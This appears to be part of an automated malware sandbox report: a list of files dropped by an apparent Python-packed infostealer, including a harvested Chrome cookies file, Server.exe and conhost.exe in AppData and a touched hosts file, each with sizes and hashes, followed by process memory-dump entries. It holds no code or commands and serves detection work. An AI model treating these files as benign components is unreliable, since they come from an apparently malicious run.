76e8ebefb9ba4ea8dcab8fce50629946af4f2b3f2f43163f75483cfb0a97968478c8aaef1d6a37be85bfc4c91a859deda6da21d3e753daefe084a203d839353d

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_988_133785773131454322\_decimal.pyd

Filesize
247KB

MD5
be315973aff9bdeb06629cd90e1a901f

SHA1
151f98d278e1f1308f2be1788c9f3b950ab88242

SHA256
0f9c6cc463611a9b2c692382fe1cdd7a52fea4733ffaf645d433f716f8bbd725

SHA512
8ea715438472e9c174dee5ece3c7d9752c31159e2d5796e5229b1df19f87316579352fc3649373db066dc537adf4869198b70b7d4d1d39ac647da2dd7cfc21e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_988_133785773131454322\_elementtree.pyd

Filesize
125KB

MD5
be02ef37d9a1c127253bc5a84705a3b7

SHA1
c313d01f999791abc9e4a7982ee6a814f8fbe6ef

SHA256
2ebb2bc6ce26d25bc2ad471f9d7edc4684064afa606f046ebf0a39c75031cb53

SHA512
2f582da0debbf5fb254e8d85e56765d2d59263a82fac91a75648575a8d95a814b231acc1a30c5bec3e3d087367996547c8affba2f09aff899a4123210e0451f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_988_133785773131454322\_lzma.pyd

Filesize
155KB

MD5
737119a80303ef4eccaa998d500e7640

SHA1
328c67c6c4d297ac13da725bf24467d8b5e982e3

SHA256
7158c1290ac29169160b3ec94d9c8bcde4012d67a555f325d44b418c54e2cc28

SHA512
1c9920e0841a65b01a0b339c5f5254d1039ef9a16fe0c2484a7e2a9048727f2cc081817aa771b0c574fb8d1a5a49dc39798a3c5e5b5e64392e9c168e1827be7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_988_133785773131454322\_queue.pyd

Filesize
31KB

MD5
8bbed19359892f8c95c802c6ad7598e9

SHA1
773fca164965241f63170e7a1f3a8fa17f73ea18

SHA256
4e5b7c653c1b3dc3fd7519e4f39cc8a2fb2746e0ecdc4e433fe6029f5f4d9065

SHA512
22ea7667689a9f049fa34ddae6b858e1af3e646a379d2c5a4aef3e74a4ff1a4109418b363c9be960127f1c7e020aa393a47885bc45517c9e9aebe71ec7cb61a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_988_133785773131454322\_socket.pyd

Filesize
77KB

MD5
64a6c475f59e5c57b3f4dd935f429f09

SHA1
ca2e0719dc32f22163ae0e7b53b2caadb0b9d023

SHA256
d03fa645cde89b4b01f4a2577139fbb7e1392cb91dc26213b3b76419110d8e49

SHA512
cf9e03b7b34cc095fe05c465f9d794319aaa0428fe30ab4ddce14ba78e835edf228d11ec016fd31dfe9f09d84b6f73482fb8e0f574d1fd08943c1ec9e0584973

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_988_133785773131454322\_sqlite3.pyd

Filesize
117KB

MD5
a7df575bf69570944b004dfe150e8caf

SHA1
2fd19be98a07347d59afd78c167601479aac94bb

SHA256
b1223420e475348c0bfb90fae33fc44ce35d988270294158ec366893df221a4b

SHA512
18c381a4ded8d33271cbf0bea75af1c86c6d34cc436f68fb9342951c071c10d84cf9f96a0509c53e5886d47fed5bca113a7f7863f6873583daa7bb6af1aa9afa

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_988_133785773131454322\_ssl.pyd

Filesize
172KB

MD5
a0b40f1f8fc6656c5637eacacf7021f6

SHA1
38813e25ffde1eee0b8154fa34af635186a243c1

SHA256
79d861f0670828dee06c2e3523e2f9a2a90d6c6996bde38201425aa4003119f1

SHA512
c18855d7c0069fff392d422e5b01fc518bbdf497eb3390c0b333ecac2497cd29abbdae4557e4f0c4e90321fba910fc3e4d235ce62b745fa34918f40fa667b713

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_988_133785773131454322\_tkinter.pyd

Filesize
62KB

MD5
89f47cd630f7dfa63268fbc52d04f9e9

SHA1
0cc250df4c2f44d8ca8820756f9f05df1e893e28

SHA256
8e4cab61b3838f9545b5d1e0b287f18c22d360b8e6a8daca4178cc69df78f83d

SHA512
bd2406ea0d5396df0153ac22ce55ca49615291ead6419a96e99007ac85059054a718c4f98942e0adb23da85899f145504b79772866d683a9a686fde6ade784e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_988_133785773131454322\_uuid.pyd

Filesize
24KB

MD5
4faa479423c54d5be2a103b46ecb4d04

SHA1
011f6cdbd3badaa5c969595985a9ad18547dd7ec

SHA256
c2ad3c1b4333bc388b6a22049c89008505c434b1b85bff0823b19ef0cf48065a

SHA512
92d35824c30667af606bba883bf6e275f2a8b5cbfea2e84a77e256d122b91b3ee7e84d9f4e2a4946e903a11293af9648a45e8cfbe247cbdc3bcdea92eb5349c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_988_133785773131454322\charset_normalizer\md.pyd

Filesize
10KB

MD5
723ec2e1404ae1047c3ef860b9840c29

SHA1
8fc869b92863fb6d2758019dd01edbef2a9a100a

SHA256
790a11aa270523c2efa6021ce4f994c3c5a67e8eaaaf02074d5308420b68bd94

SHA512
2e323ae5b816adde7aaa14398f1fdb3efe15a19df3735a604a7db6cadc22b753046eab242e0f1fbcd3310a8fbb59ff49865827d242baf21f44fd994c3ac9a878

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_988_133785773131454322\libffi-8.dll

Filesize
38KB

MD5
0f8e4992ca92baaf54cc0b43aaccce21

SHA1
c7300975df267b1d6adcbac0ac93fd7b1ab49bd2

SHA256
eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a

SHA512
6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_988_133785773131454322\main.exe

Filesize
36.6MB

MD5
fd558700e832c55b847fbaa2f9c77f48

SHA1
db8a95fa38c5f59f7908c4a36efe4f62191c3f77

SHA256
89ccb259276786bda67b5f70d1dbc55eb7d0ab6333254f75b6f60fee10c30637

SHA512
14d275d4f3b9c4c06920dbc7fd85c01357402eba85968a06cabb0852c43d9d64d1d30e9dffd744c450b3174064f95076369f1f8173dcfd3412b89f194f71dc41

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_988_133785773131454322\python311.dll

Filesize
5.5MB

MD5
58e01abc9c9b5c885635180ed104fe95

SHA1
1c2f7216b125539d63bd111a7aba615c69deb8ba

SHA256
de1b95d2e951fc048c84684bc7df4346138910544ee335b61fc8e65f360c3837

SHA512
cd32c77191309d99aeed47699501b357b35669123f0dd70ed97c3791a009d1855ab27162db24a4bd9e719b68ee3b0539ee6db88e71abb9a2d4d629f87bc2c081

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_988_133785773131454322\sqlite3.dll

Filesize
1.4MB

MD5
b49b8fde59ee4e8178c4d02404d06ee7

SHA1
1816fc83155d01351e191d583c68e722928cce40

SHA256
1afd7f650596ad97fcf358b0e077121111641c38ca9d53132bab4c9588cf262f

SHA512
a033ce87c2e503b386fb92aa79a7ec14d6c96e4a35d0cb76d4989bacd16f44c4ed5ac4e13057f05f9d199a3fd8545b9a25296515ec456f29c464d949ff34942a

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_988_133785773131454322\tk86t.dll

Filesize
1.5MB

MD5
499fa3dea045af56ee5356c0ce7d6ce2

SHA1
0444b7d4ecd25491245824c17b84916ee5b39f74

SHA256
20139f4c327711baf18289584fa0c8112f7bb3ba55475bded21f3d107672ed94

SHA512
d776749effa241ba1415b28d2fcff1d64ed903569a8c4e56dfddd672a53b2f44119734b1959b72a9b3f4060bb2c67b7dea959cc2d4a8e9f781f17009c6840fc1

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_988_133785773131454322\unicodedata.pyd

Filesize
1.1MB

MD5
1905b5d0f945499441e8cd58eb123d86

SHA1
117e584e6fcc0e8cfc8e24e3af527999f14bac30

SHA256
b1788b81fa160e5120451f9252c7745cdde98b8ce59bf273a3dd867bb034c532

SHA512
ed88cd7e3259239a0c8d42d95fa2447fc454a944c849fa97449ad88871236fefdafe21dbfa6e9b5d8a54ddf1d5281ec34d314cb93d47ce7b13912a69d284f522

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_988_133785773131454322\win32security.pyd

Filesize
133KB

MD5
0007e4004ee357b3242e446aad090d27

SHA1
4a26e091ca095699e6d7ecc6a6bfbb52e8135059

SHA256
10882e7945becf3e8f574b61d0209dd7442efd18ab33e95dceececc34148ab32

SHA512
170fa5971f201a18183437fc9e97dcd5b11546909d2e47860a62c10bff513e2509cb4082b728e762f1357145df84dcee1797133225536bd15fc87b2345659858

Download Submit
C:\Users\Admin\AppData\Local\Temp\weRaOiIZmWiHJ8H\Browsers\Cookies\Chrome Cookies.txt

Filesize
260B

MD5
f91f0da1ba49fa2141eda18fc52f8d1a

SHA1
26af065e31c9bd8a9d3b31e4801c4397d920619c

SHA256
4ba50545c3a161f29660b1a4c2e089551d19dd1cb500611cae9a272fb255f625

SHA512
cfa213a783a767f6dc14fb46952c050bbac3136073f49e5a920b0177a0644d05ff8a3464c24a94192a9aebff4e2d0361efe6dd21df55d89d2031c281509982b7

Download Submit
C:\Users\Admin\AppData\Roaming\Server.exe

Filesize
23KB

MD5
32fe01ccb93b0233503d0aaaa451f7b2

SHA1
58e5a63142150e8fb175dbb4dedea2ce405d7db0

SHA256
6988ee719a54c93a89303dcff277c62ae4890274cc45f074bc7effde315fbf43

SHA512
76945f23a49d594e325d80ffc0570341044ac0b97bd889c92f90bc56d3cdff5c1b29178be4f157c8c1bb9ce7cc311765309f2e6f7b08b24e7acf983ea67635a6

Download Submit
C:\Users\Admin\AppData\Roaming\conhost.exe

Filesize
37KB

MD5
b37dd1a1f0507baf993471ae1b7a314c

SHA1
9aff9d71492ffff8d51f8e8d67f5770755899882

SHA256
e58e8918a443c0061add029f8f211f6551a130202195cc2b9b529ea72553e0bc

SHA512
ac76d5b10540eb292341f30c7abfd81f03be65f6655c814aba6ac6a0ecf4f0f2c34c3b8e63ceef8c4579f98b7459e51b9fdd30d601c6d1930860ab7c154da460

Download Submit
C:\Users\Admin\Desktop\aquatic\config.toml

Filesize
202B

MD5
fe783a62cf5f5e09a7d8c6fd17ae60df

SHA1
46fa99c2b4c4158e9d9542559f11f34df5da8840

SHA256
3188d09b74d87c1f1d1b6cd2624ef6fbb02aa27183e4908bed30f7f8ecd371b5

SHA512
d20a4d9c2a6f6ee2a7f4bc7d86264d1028d17db6e6cd868a27ff6d191170104bd99641dbba636d05588ad5e031ba378dcb28420b8a38363fcfadbb2608d25de3

Download Submit
C:\Users\Admin\Desktop\aquatic\main.exe

Filesize
24.1MB

MD5
c4639a9dd4fa418a1e2e5537b9a53bfe

SHA1
9fea0f4615170667aa59dac92f6d424455b5fc54

SHA256
6548853e51522d28bc2d4ee6dbecdfe7be496462cb87f26587f830374ce07ec7

SHA512
2e5f53a2d4bae0028ecb715485327db9da7aeb45176e7e54db039516dab6002f41b5f44ae728f7752ee840f34b14ac78698cea3bc4cc2d00ea815873bad6b692

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
4028457913f9d08b06137643fe3e01bc

SHA1
a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

SHA256
289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

SHA512
c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

Download Submit
memory/644-700-0x000001D72ABF0000-0x000001D72AD3F000-memory.dmp

Filesize
1.3MB

Download
memory/652-230-0x00000248A7DF0000-0x00000248A7F3F000-memory.dmp

Filesize
1.3MB

Download
memory/656-534-0x0000015ECC270000-0x0000015ECC3BF000-memory.dmp

Filesize
1.3MB

Download
memory/752-183-0x000002207F480000-0x000002207F5CF000-memory.dmp

Filesize
1.3MB

Download
memory/752-172-0x000002207F3E0000-0x000002207F402000-memory.dmp

Filesize
136KB

Download
memory/860-834-0x0000013DD1F80000-0x0000013DD20CF000-memory.dmp

Filesize
1.3MB

Download
memory/900-485-0x000001C071980000-0x000001C071ACF000-memory.dmp

Filesize
1.3MB

Download
memory/948-159-0x00000000004E0000-0x00000000009F4000-memory.dmp

Filesize
5.1MB

Download
memory/1032-613-0x00000254B9E60000-0x00000254B9FAF000-memory.dmp

Filesize
1.3MB

Download
memory/1052-363-0x00000194FC310000-0x00000194FC45F000-memory.dmp

Filesize
1.3MB

Download
memory/1120-308-0x00000223C64F0000-0x00000223C663F000-memory.dmp

Filesize
1.3MB

Download
memory/1208-123-0x0000000000120000-0x000000000065E000-memory.dmp

Filesize
5.2MB

Download
memory/1224-207-0x000001442CE60000-0x000001442CEB0000-memory.dmp

Filesize
320KB

Download
memory/1224-206-0x00000144459B0000-0x0000014445A26000-memory.dmp

Filesize
472KB

Download
memory/1224-208-0x000001442CEB0000-0x000001442CECE000-memory.dmp

Filesize
120KB

Download
memory/1224-142-0x000001442B110000-0x000001442B150000-memory.dmp

Filesize
256KB

Download
memory/1224-251-0x000001442B680000-0x000001442B68A000-memory.dmp

Filesize
40KB

Download
memory/1224-252-0x000001442CED0000-0x000001442CEE2000-memory.dmp

Filesize
72KB

Download
memory/1296-892-0x000001FCBE420000-0x000001FCBE56F000-memory.dmp

Filesize
1.3MB

Download
memory/1332-267-0x000002D4F3270000-0x000002D4F33BF000-memory.dmp

Filesize
1.3MB

Download
memory/1368-294-0x000001E324ED0000-0x000001E32501F000-memory.dmp

Filesize
1.3MB

Download
memory/1440-921-0x00000292FC3B0000-0x00000292FC4FF000-memory.dmp

Filesize
1.3MB

Download
memory/1484-171-0x00000000008F0000-0x0000000000900000-memory.dmp

Filesize
64KB

Download
memory/1496-882-0x000001D1C1D60000-0x000001D1C1EAF000-memory.dmp

Filesize
1.3MB

Download
memory/1496-955-0x000002E4619B0000-0x000002E461AFF000-memory.dmp

Filesize
1.3MB

Download
memory/1652-734-0x0000021DC36F0000-0x0000021DC383F000-memory.dmp

Filesize
1.3MB

Download
memory/1688-785-0x000001C9B4E10000-0x000001C9B4F5F000-memory.dmp

Filesize
1.3MB

Download
memory/1828-240-0x0000022363C40000-0x0000022363D8F000-memory.dmp

Filesize
1.3MB

Download
memory/1916-329-0x00000123A7E10000-0x00000123A7F5F000-memory.dmp

Filesize
1.3MB

Download
memory/1972-819-0x000002256FD20000-0x000002256FE6F000-memory.dmp

Filesize
1.3MB

Download
memory/2068-710-0x000001AE78060000-0x000001AE781AF000-memory.dmp

Filesize
1.3MB

Download
memory/2244-686-0x0000024CCD180000-0x0000024CCD2CF000-memory.dmp

Filesize
1.3MB

Download
memory/2284-388-0x000002196EF60000-0x000002196F0AF000-memory.dmp

Filesize
1.3MB

Download
memory/2288-436-0x000001F5DB100000-0x000001F5DB24F000-memory.dmp

Filesize
1.3MB

Download
memory/2344-153-0x0000000000B30000-0x0000000000B48000-memory.dmp

Filesize
96KB

Download
memory/2384-671-0x00000200EE2A0000-0x00000200EE3EF000-memory.dmp

Filesize
1.3MB

Download
memory/2400-858-0x0000012568610000-0x000001256875F000-memory.dmp

Filesize
1.3MB

Download
memory/2412-519-0x00000272C41A0000-0x00000272C42EF000-memory.dmp

Filesize
1.3MB

Download
memory/2504-461-0x000001276CB40000-0x000001276CC8F000-memory.dmp

Filesize
1.3MB

Download
memory/2544-203-0x00000242AEE90000-0x00000242AEFDF000-memory.dmp

Filesize
1.3MB

Download
memory/2588-931-0x0000018BCA410000-0x0000018BCA55F000-memory.dmp

Filesize
1.3MB

Download
memory/2592-661-0x00000207CA750000-0x00000207CA89F000-memory.dmp

Filesize
1.3MB

Download
memory/2800-402-0x0000021456D60000-0x0000021456EAF000-memory.dmp

Filesize
1.3MB

Download
memory/2880-809-0x00000121783D0000-0x000001217851F000-memory.dmp

Filesize
1.3MB

Download
memory/2888-373-0x000002A370820000-0x000002A37096F000-memory.dmp

Filesize
1.3MB

Download
memory/2892-907-0x00000245CC040000-0x00000245CC18F000-memory.dmp

Filesize
1.3MB

Download
memory/2940-744-0x000001C7A1B50000-0x000001C7A1C9F000-memory.dmp

Filesize
1.3MB

Download
memory/2940-980-0x0000021AB7E80000-0x0000021AB7FCF000-memory.dmp

Filesize
1.3MB

Download
memory/3152-965-0x000001B92B290000-0x000001B92B3DF000-memory.dmp

Filesize
1.3MB

Download
memory/3216-257-0x00000202C6E40000-0x00000202C6F8F000-memory.dmp

Filesize
1.3MB

Download
memory/3512-848-0x00000216B1960000-0x00000216B1AAF000-memory.dmp

Filesize
1.3MB

Download
memory/3520-113-0x00007FF8EB080000-0x00007FF8EC00C000-memory.dmp

Filesize
15.5MB

Download
memory/3520-115-0x00007FF8EB080000-0x00007FF8EC00C000-memory.dmp

Filesize
15.5MB

Download
memory/3548-339-0x000001D8C0190000-0x000001D8C02DF000-memory.dmp

Filesize
1.3MB

Download
memory/3592-775-0x0000029EEC860000-0x0000029EEC9AF000-memory.dmp

Filesize
1.3MB

Download
memory/3592-773-0x0000029EEC860000-0x0000029EEC9AF000-memory.dmp

Filesize
1.3MB

Download
memory/3684-637-0x0000021230800000-0x000002123094F000-memory.dmp

Filesize
1.3MB

Download
memory/3736-412-0x0000027E6FB40000-0x0000027E6FC8F000-memory.dmp

Filesize
1.3MB

Download
memory/3804-509-0x00000273577D0000-0x000002735791F000-memory.dmp

Filesize
1.3MB

Download
memory/3804-446-0x0000021870C10000-0x0000021870D5F000-memory.dmp

Filesize
1.3MB

Download
memory/3812-554-0x0000012D29FC0000-0x0000012D2A10F000-memory.dmp

Filesize
1.3MB

Download
memory/3820-475-0x0000027B99C00000-0x0000027B99D4F000-memory.dmp

Filesize
1.3MB

Download
memory/3992-588-0x00000233B1A30000-0x00000233B1B7F000-memory.dmp

Filesize
1.3MB

Download
memory/4124-564-0x0000026063B80000-0x0000026063CCF000-memory.dmp

Filesize
1.3MB

Download
memory/4548-598-0x0000022EE7720000-0x0000022EE786F000-memory.dmp

Filesize
1.3MB

Download
memory/4548-296-0x0000021F44B20000-0x0000021F44C6F000-memory.dmp

Filesize
1.3MB

Download
memory/4616-627-0x000002886EBE0000-0x000002886ED2F000-memory.dmp

Filesize
1.3MB

Download
memory/5032-759-0x0000020C71C00000-0x0000020C71D4F000-memory.dmp

Filesize
1.3MB

Download